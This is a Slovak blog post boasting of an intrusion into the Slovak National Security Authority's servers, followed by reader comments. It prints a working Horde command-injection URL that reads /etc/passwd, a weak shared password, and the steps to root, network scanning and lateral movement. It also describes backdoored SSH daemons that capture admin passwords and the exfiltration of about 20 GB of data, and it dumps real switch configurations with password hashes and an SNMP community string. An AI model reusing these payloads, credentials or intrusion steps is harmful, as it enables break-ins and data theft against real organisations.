Vdaka primitivnemu zabezpeceniu spominanej institucie doslo k analnej penetracii serverov NBU bez vedomia milanovho. z nbu uniklo 20 gigabajtov mailov, internych dokumentov, smernic, nariadeni a podobnych pic**** :)
vsetko sa zacalo pri vtipkoch medzi kamaratmi, ktori si vsimli chybu v mailovom rozhrani na adrese webmail.nbusr.sk, pomocou ktorej bolo mozne vykonavat systemove prikazy na serveri. (ja viem, tato veta znie uplne napicu, ale tak nech chapu aj ludia menej zasveteni danej problematike ;))
tym padom bolo mozne prevziat zoznam lokalnych userov na masine.
http://webmail.nbusr.sk/horde/services/help/
?show=about&module=;%22.passthru(%22cat%20%22.
chr(47).%22etc%22.chr(47).%22passwd%22);%27.
do oci bil najma uzivatel s loginom nbusr
nuz...
kruty vtip - pouzit heslo nbusr123 - nam takmer roztrhol branice - heslo fungovalo (na prvy pokus). ukazalo sa motd a boli sme prihlaseni na masine
po chvilke skumania a behania po stroji sme skusili su na roota utok na branice cislo 2 :)
%su
www.nbusr.sk# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
www.nbusr.sk# uname -a
FreeBSD www.nbusr.sk 6.0-RELEASE FreeBSD 6.0-RELEASE #0:Thu Nov 3 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386
www.nbusr.sk#
cize (pre ludi neznalych) ziskanie plnych prav nad serverom bolo z loginu nbusr mozne bez zadania akehokolvek hesla..
dalej prisiel scan na 10.0.240.0/24 co je subnet, v ktorom sa dana masina nachadza. (takze sme scanovali stroje, ktore uz nie su bezne dostupne z internetu a maju byt chranene ohnivou stenou ;)
odpovedalo cca 5-6 strojov na ktorych pocuvalo aj sshd.
takze dalej sme sa skusili prihlasit na jednu z tychto masin, uz so znamym loginom a heslom nbusr/nbusr123. samozrejme, situacia sa opakovala a opat sme mali shell.
tento stroj mal nazov archive, co naznacovalo ze sa tam bude nachadzat nieco zaujimave.
po asi pol hodine behania po disku sme nasli v homedire jedneho z adminov zdrojaky akejsi backupovacej utility pisanej v cecku. (btw vcelku dobry kod, aj ked backupovanie pgsql riesit v cecku mi pride ako skrabanie sa
nbusr@archive> su
Password:
nbusr@archive# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
nbusr@archive# uname -a
FreeBSD archive.nbusr.sk 4.10-STABLE FreeBSD 4.10-STABLE #1: Mon Feb 14 14:47:10
CET 2005 root@archive.nbusr.sk:/usr/src/sys/compile/ARCHIVE i386
nbusr@archive#
dalsi zachvat branice..
z archivu sme si odniesli cca 18 gb databazu taktiez zaujimavou masinou bolo ep.nbusr.sk ;)
po ziskani tohoto hesla sa nam otvorila v podstate cela siet, kedze heslo fungovalo na vsetky ostatne zariadenia unixoveho (servre) alebo sietoveho charakteru (cisco routre/switche). vecer sa nasadili na masiny zabackdoorovane ssh demony, ktore nam zaznamenavali pohyb adminov po dalsich strojoch (aj s heslami of course :) )
pod ruskom noci cez switche a routre veselo tiekli gigabajty mejlov a inych dovernych dat ku nam, do spravnych ruk na kryptovane disky ;)
po bezradnych tahoch administratorov je v dobe pisania tohto clanku stale mozny plny pristup do siete nbu. ktokolvek s minimalnymi znalostami pocitacov si moze v pohodli svojho domova pristupovat k ich datam. nie vsetko co je bezpecne je naozaj bezpecne a nie vsetko co je tajne je az tak tajne :) smutnym mementom tohto cinu je zistenie, ze azet je lepsie zabezpecenym systemom ako institucia zastresujuca vysoko doverne dokumenty.
tymto sa s vam lucime, pozdravujem babicku a psa filipa, feriho.. chcem svetovy mier, radostny zivot pre vsetky deti sveta a papiere pre kazdeho :)
lahodka na zaver, narodny (ne)bezpecnostny urad:
(dokumenty kvoli obavam z obvieniam z vlastizrady a upaleniu na hranici zverejnovat nebudeme)
taakze, nejake tie prompty, konfigy, mejly ;)
enjoy
update: kedze okolo celej situacie vznikla slusna afera, mozete si kupit aj recesisticke tricka.
root@fw.nbu.ba# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uz root@fw.nbu.ba# uname -a
FreeBSD fw.nbu.ba 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Wed Jul 14 15:56:18 GMT 2004 kockac@builder.netlabplus.sk:/usr/src/release/picobsd/build_dir-fleshboxR/PICOBSD-fleshboxR i386
root@fw.nbu.ba#
root@fw.nbu.ba# df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/md0c 47M 24M 23M 52% /
root@fw.nbu.ba#
s4.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(14)EA1a, RELEASE SOFTWARE
(fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 02-Sep-03 03:33 by antonino
Image text-base: 0x80010000, data-base: 0x805C0000
ROM: Bootstrap program is CALHOUN boot loader
s4.nbu.ba uptime is 45 weeks, 5 days, 16 hours, 10 minutes
System returned to ROM by power-on
System restarted at 11:31:30 CETdst Sat Jun 4 2005
System image file is "flash:/c2950-i6q4l2-mz.121-14.EA1a.bin"
cisco WS-C2950-24 (RC32300) processor (revision M0) with 20710K bytes of memory.
Processor board ID FOC0752Y3BL
Last reset from system-reset
Running Standard Image
24 FastEthernet/IEEE 802.3 interface(s)
s7.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5)WC9, RELEASE SOFTWARE
(fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Fri 19-Sep-03 10:01 by antonino
Image text-base: 0x00003000, data-base: 0x0034E434
ROM: Bootstrap program is C3500XL boot loader
s7.nbu.ba uptime is 45 weeks, 5 days, 15 hours, 13 minutes
System returned to ROM by power-on
System restarted at 12:08:39 CETdst Sat Jun 4 2005
System image file is "flash:c3500xl-c3h2s-mz.120-5.WC9.bin"
cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes o
f memory.
Processor board ID FAB0547P1KW, with hardware revision 0x00
Last reset from power-on
s9.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C3500XL Software (C3500XL-C3H2S-M), Version 12.0(5.2)XU, MAINTENANCE INT
ERIM SOFTWARE
Copyright (c) 1986-2000 by cisco Systems, Inc.
Compiled Mon 17-Jul-00 18:29 by ayounes
Image text-base: 0x00003000, data-base: 0x00301F3C
ROM: Bootstrap program is C3500XL boot loader
s9.nbu.ba uptime is 45 weeks, 5 days, 14 hours, 46 minutes
System returned to ROM by power-on
System restarted at 12:34:15 CETdst Sat Jun 4 2005
System image file is "flash:c3500XL-c3h2s-mz-120.5.2-XU.bin"
cisco WS-C3524-XL (PowerPC403) processor (revision 0x01) with 8192K/1024K bytes o
f memory.
Processor board ID FAB0514Q18E, with hardware revision 0x00
Last reset from power-on
s11.nbu.ba#sh ver
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(13)EA1, RELEASE SOFTWARE (
fc1)
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Tue 04-Mar-03 02:14 by yenanh
Image text-base: 0x80010000, data-base: 0x805A8000
ROM: Bootstrap program is CALHOUN boot loader
s11.nbu.ba uptime is 3 weeks, 3 days, 11 hours, 30 minutes
System returned to ROM by power-on
System image file is "flash:/c2950-i6q4l2-mz.121-13.EA1.bin"
cisco WS-C2950G-24-EI (RC32300) processor (revision G0) with 20839K bytes of memo
ry.
Processor board ID FOC0743Z2H9
Last reset from system-reset
Running Enhanced Image
24 FastEthernet/IEEE 802.3 interface(s)
2 Gigabit Ethernet/IEEE 802.3 interface(s)
mno a nejaky ten cicko konfig ;)
root@archive# telnet 10.0.200.11
Trying 10.0.200.11...
Connected to 10.0.200.11.
Escape character is '^]'.
User Access Verification
Username: nbusr
Password:
s11.nbu.ba>ena
Password:
Password:
s11.nbu.ba#sh run
Building configuration...
Current configuration : 3761 bytes
!
version 12.1
no service pad
service timestamps debug datetime msec localtime show-timezone
service timestamps log datetime msec localtime show-timezone
service password-encryption
!
hostname s11.nbu.ba
!
enable password 7 101F5B4A514244
!
username nbusr password 7 070123595D1B485744
clock timezone CET 1
clock summer-time CETdst recurring last Sun Mar 2:00 last Sun Oct 3:00
ip subnet-zero
ip rcmd rsh-enable
ip rcmd remote-host monitor 10.0.240.7 monitor enable
ip rcmd remote-host www 10.0.240.7 www enable
no ip domain-lookup
!
spanning-tree mode pvst
no spanning-tree optimize bpdu transmission
spanning-tree extend system-id
!
!
interface FastEthernet0/1
description 919 - III 11 08
switchport trunk native vlan 999
switchport mode trunk
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/3
escription 1118 - 18 2
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/4
description 1116 - 16 5
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/5
description 1114 - 14 9
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/6
description 1114 - 14 10
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/7
description 1112 - 12 13
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet
description 1111 - 11 15
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/9
description 1130 - 30 18
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/10
description 1124 - 24 30
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/11
description 1123 - 23 32
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
!
interface FastEthernet0/12
description 1122 - 22 33
switchport access vlan 3
no ip address
load-interval 60
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/13
switchport access vlan 3
switchport mode access
no ip address
no cdp enable
spanning-tree portfast
!
interface FastEthernet0/14
no ip address
no cdp enable
!
interface FastEthernet0/15
no ip address
no cdp enable
ernet0/8
!
interface FastEthernet0/16
no ip address
no cdp enable
!
interface FastEthernet0/17
no ip address
no cdp enable
!
interface FastEthernet0/18
no ip address
no cdp enable
!
interface FastEthernet0/19
no ip address
no cdp enable
!
interface FastEthernet0/20
no ip address
no cdp enable
!
interface FastEthernet0/21
no ip address
no cdp enable
!
interface FastEthernet0/22
no ip address
no cdp enable
!
interface FastEthernet0/23
no ip address
no cdp enable
!
interface FastEthernet0/24
no ip address
no cdp enable
!
interface GigabitEthernet0/1
no ip address
no cdp enable
!
interface FastEthernet0/24
no ip address
no cdp enable
!interface GigabitEthernet0/1
no ip address
no cdp enable
!
interface GigabitEthernet0/2
no ip address
no cdp enable
!
interface Vlan1
ip address 10.0.200.11 255.255.255.0
no ip route-cache
!
ip default-gateway 10.0.200.1
no ip http server
!
no cdp run
snmp-server engineID local 00000009020000078432D3C0
snmp-server community swmon RO
!
line con 0
exec-timeout 0 0
logging synchronous
login local
stopbits 1
line vty 0 4
exec-timeout 0 0
logging synchronous
login local
line vty 5 15
exec-timeout 0 0
logging synchronous
login local
!
ntp clock-period 17179919
ntp server 213.215.72.7
end
a nejaky ten vlan semtam :) :
s9.nbu.ba#sh vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Gi0/1, Gi0/2
2 Servers active
3 Workstations active Fa0/5, Fa0/6, Fa0/7, Fa0/8,
Fa0/9, Fa0/10, Fa0/11, Fa0/12,
Fa0/13, Fa0/15, Fa0/16, Fa0/17,
Fa0/18, Fa0/19, Fa0/20, Fa0/21,
Fa0/22, Fa0/23, Fa0/24
4 Govnet active Fa0/14
999 Dummy active
mno a toto je platene z penazi slovenskych danovych poplatnikov ;)
(ukazka z mailovej komunikacie jedneho zo zamestnancov)
Date: Fri, 24 Feb 2006 12:53:50 +0100
From: xxxx xxxx
Subject: ahojky
To: xxx xxx
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
Ahoj xxxx, zdravi Ta xxxx ("hajzel z Komjatic" xixi).
Ty sa mi nejako neozyvas z toho Londonu.... ja viem neni tolko casu. A ja tiez nepisem nejako obzvlast casto... prepac!!! Ani neviem o com ti mam napisat,... tolko kreativity som u seba este nevidel, xaxa
pornaky nemali?:)
hh myslis ze tech 18GB co stahly byly jen nejaky nazazivny data? To je jasny ze tak 80% byly pornace.:]]
myslim ze aj v realnych materialoch nbu je nejake to XXX ;)
jj, presne, ja si tiez myslim ze v tom bude nieco take, ved sme k*r*a na slovensku, tu je mozne vsetko
to je fakt, a urcite to prejde tak ze sa zodpovednym nic nestane.
oprava hudobnych nastrojov
oprava hudobnych nastrojov? si chod robit reklamu niekde inde
__________
zero
musim uznat,som shocknuty.
A ta emailova komunikacia fakt stoji za to,
plus ich drsna security policy, nespravuju to tam nejaky brigadnici? Co v tesku pred tym dokladali nudle do regalov?
ja sa v statnej sprave sice velmi nevyznam, ale statna sprava nesmie pouzivat necertifikovane operacne systemy. certifikacie sa nedostavaju len tak z nicoho. pokial viem, tak FreeBSD k certifikovanym systemom nepatri. pokial viem dalej, aj kompletna infrastruktura musi spadat pod iste normy, na zaklade ktorych je vybudovana. preto sa mi zda celkom nerealne pouzitie danych operacnych systemov, pouzitie webservera ktory je pichnuty aj na externy interfejs aj na lan a celkova popisovana politika.
stat sa sice moze vselico ale ja by som sa skor priklanal k nazoru ze clanok ma trochu pomasirovat verejnu mienku a zistit do ktoreho kosiara sa stado oveciek vyberie.
Kazdopadne tam maju nezapatchovane horde a ten exploit je uz nejaku nedelu stary ;-) cize su to lamy tak ci tak...
anyway je to dost velky trapas pre taku instituciu IMHO/
Ano a lama je aj autor clanku, aj ked slovko lama docela dost nemam rad. Pretoze spajat jednu neopatchovanu aplikaciu s primitivnym zabezpecenim a vobec napisat clanok stylom, akym je to napisane.. to je lamerske a infantilne. Ale ved sa tesme ako maly Jarda z prskaviek..
ak toto spaja autor clanku s nejakym valnym uspechom tak sa s tym moze xvalit akurat tak ostatnym spoluziakom na ucilisti a analne moze penetrovat akurat svojich rapavych kamosov. akoze sila, ze to bolo tak "bezpecne" zabezpecene ale klobuk by som si snal, keby zlomili aspon nejake heslo a nie to co tam bolo (to sa ani heslom neda nazvat). a to ze sem capol judash nejaky vymysleny mail zase neznamena, ze stade stiahli huGe gigas mailos. takzeslabota
no alespon neco dokazali...
a co prosim ta dokazal? najst chybu na webmail? Ano to dokazal. A mozno sosnut par mejlov. To by dokazal aj matelko na peemdecku. je to obycajny chvalenkar. vraj analna penetracia. keby stiahol alebo presiel niekam dalej nepoviem ani slovi4cko. ale na to uz nemal.
dobre mas pravdu nechci se hadat... ja jenom , ze alespon neco udelal...dneska ma kazdy plnou hubu kecu a skutek utek.
NBU nedal certifikat na iny OS okrem win2k a xp.
compy kde su utajovane dokumenty "Doverne" musia pracovat ako samostatne pc nepripojene do siete.
Po tom co sa dozvedeli z novin a blachole ze vidno ten ich etc/passwd konecne zareagovali a uz ho od cca 8.30 nevidiet...
ja stale vidim...
Sypem si popol na hlavu :) Este stale to vidiet... Blby cut and paste.
A co take, relevantne, vycitas z passwd? :) ak neratam username, *id, shell a home. Bavime sa o bsdckovom passwd.
Ak mas ssh cez kluce a nie hesla? Tak co, budes si cvicit svoju anglicku-indicku-farsi vocabulary? :) Ale zabezpecenie hesiel a pristupov je trosku uz mozno mimo temu teraz.
jeeeeeeeeeej kockac im komplikoval kernel :-))) musim sa ho na to spytat :-))))
Ha ha to je fuckt fuste ale ked som to skusal tak mi neotvorilo ani uvodnu stranku.
Maju smolui ja sa nevzdavam.
Hej a co takto ukazat nejake tie data ved v tych 20G musia byt nejake pekne bezpecnostne previerky alebo ine zaujimavosti ^^
Its evolution, baby
toto je fakt zaostali stat??? mma tu hackerov a inych rozumnych ludi, nie aby si ich najimali na zabezpecenie svojich sieti a kompov, ale nie oni ich chytaju, namiesto toho aby si ich najali, ako to robia amici
Slušná reklama pre blackhole ;) "23489 reads"
_______________________________
I don't need no arms around me,
I don't need no drugs to calm me...
Another brick in the wall
blackhole vzdy vedel ako zaujat! :) Najprv to bol iba azet a teraz rovno NBU? Pekne...
omg uz davno som sa tak nepobavil ... :D
jednoducho klobuk dole pred urovnou sysadminov z NBU. prisaham bohu tie masiny by lepsie zabezpecila aj moja 100rocna babka.
napr v USA si vlada plati najlepsich hackerov na zabezpecenie top secret informacii a u nas je zabezpecenie na urovni kavoveho automatu.
velebnosti jdu blejt...
takyto admini su v celej statnej sprave, cize rozum nemusi vobec stat, je to chyba tejto spolocnosti v ktorej sa nachadzame, stat radsej pozaduje na papiery 8 VS ako to co ma dany clovek v hlavicke.......
suhlas
uplny suhlas, ale zober si, ze ked tam maju tabulkove platy, tak kto by sa unuval robit??? no neviem ci by sa mi chcelo, radsej by som vypadol niekde za hranice ... (keby bolo na mne ;) )
Akoze pani tak to to je asi joke, lebo som skoro padol pod stol ked som to cital:)
normalny clovek by neveril ze toto je mozne.
Urad co spravuje extremne utajene data a ma ich na certifikovanych windows server,XP a ktomu ma derave servery pripojene do internetu fakt efektivne vyuziva dane :-)
Mohlo by to fungovat ako taka wargame, Hackni si svoj NBU :D
Celkovo sa to zda divne, nie je to nakoniec len honeypot? -), ved FreeBSD je fakt prilis open trusted. Ale na co by investovali tolko energie do lanky honeypotov. ibaze by to bolo cele paranoidne vymyslene aby Kalinak mohol pytat viac prachov pre NBUsr.
to napadlo aj mna.... ale podla mna by to bol uz poriadny socialny hack.
ale aj tak. nechat si naschval slabe zabezpecenie, ved sa niekto najde...
ale pochybujem.
administrator (ak sa tak da nazvat..) nbusr.sk je zrejme idiot :-) looser! je mi s neho do placu..
je mi z toho zle...
na jojke bolo, ze sa im podarilo s utocnikmi skontaktovat a bol tam zaznam "rozhovoru". neviem ci tomu verit. mozno poviete, spolahni sa na svoj vlastny usudok, ale aj tak. ak by sa naaaahodickou :) nasiel niekto kto ma k tomu blizsie, mohol by sa vyjadrit. no ale pochybujem. ale aj tak, za pokus to stoji ;)
no dobre som sa natom pobavil ;-))) jojka sa vyznacuje obcas tym ze robi veci "zaujimavajsimi"
ale ten talk vo windows putty bol celkom zabavny ;-)
ved to. potom clovek nevie co je skutocnost a co fikcia. a urcite nemam zaujem hrat sa verte neverte
telku nesledujem a jedine zkadial mam inf. su internet a sme internet neviem ale vod sme ocakavam istu realitu
---
vsetky ludske vynalezi su len snaha napodobnit prirodu
Patrik Paukov
magori nie ze by boli radi ze niekto im zadarmo nasiel dieru/y v systeme a oni este stu pre Nich (respekt!!) 8 rôckov vo vazbe. jediny kto by to mal schytat su ti inteligenti z NBU, kt. si davaju super neuhadnutelne hesla.
tak v tomhle mas recht... meli by tem hackerum jeste podekovat...
Nic sa neje take horuce ako sa navari. Nasa mila prokuratura zacala stihat za paragraf 247, ktory mozno pouzit iba po slusnej davke travy.
Osobne som dost silno presvedceny, ze budu mat problem preukazat jednu z fakultativnych znakov skutkovej podstaty (sorry za pravnicinu)- motiv...
A okrem toho sa da z vreca vytiahnut este zopar pravnych dirty tricks.
--------------
Zerte lequar, je kua zdravy !
pekna citanost chlapci ;)
76146 reads
no pekne...
---------------------------------------
nadani ucit se je dar;
schopnost ucit se je dovednost;
ochota ucit se je volba;